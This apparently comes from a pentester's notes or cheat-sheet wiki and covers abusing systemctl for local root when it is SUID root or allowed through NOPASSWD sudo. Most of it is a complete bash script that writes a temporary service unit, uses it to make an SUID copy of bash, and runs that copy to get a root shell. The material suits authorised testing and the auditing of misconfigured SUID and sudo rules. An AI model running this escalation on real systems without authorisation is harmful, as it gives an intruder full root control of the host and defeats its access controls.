# systemctl If [systemctl is SUID root](https://gtfobins.github.io/gtfobins/systemctl/#suid), then a malicious service file can easily be abused to create a root shell. ```bash FILE=`mktemp -u` cat > ${FILE}.service << EOF [Service] Type=oneshot ExecStart=/bin/cp /bin/bash ${FILE}.sh ExecStart=/bin/chmod +xs ${FILE}.sh [Install] WantedBy=multi-user.target EOF systemctl link ${FILE}.service systemctl start ${FILE}.service ${FILE}.sh -p # Root! ``` Even if [systemctl is not SUID root](https://gtfobins.github.io/gtfobins/systemctl/#sudo), so long as you have NOPASSWD [[sudo]] access to it this trick will still work.